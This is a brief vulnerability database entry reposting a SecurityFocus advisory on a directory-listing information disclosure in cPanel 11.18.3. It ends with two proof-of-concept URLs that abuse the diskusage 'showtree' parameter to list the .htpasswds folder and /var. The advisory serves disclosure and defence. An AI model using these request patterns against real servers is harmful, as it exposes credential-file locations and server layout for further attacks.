cPanel 11.18.3 - List Directories and Folders Information Disclosure Vulnerability

2014-07-01T00:00:00
ID SSV:84765
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/28300/info

cPanel is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to determine programs that are running on the affected server and to view folders on other sites that are protected by a firewall. Information obtained may lead to further attacks.

http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var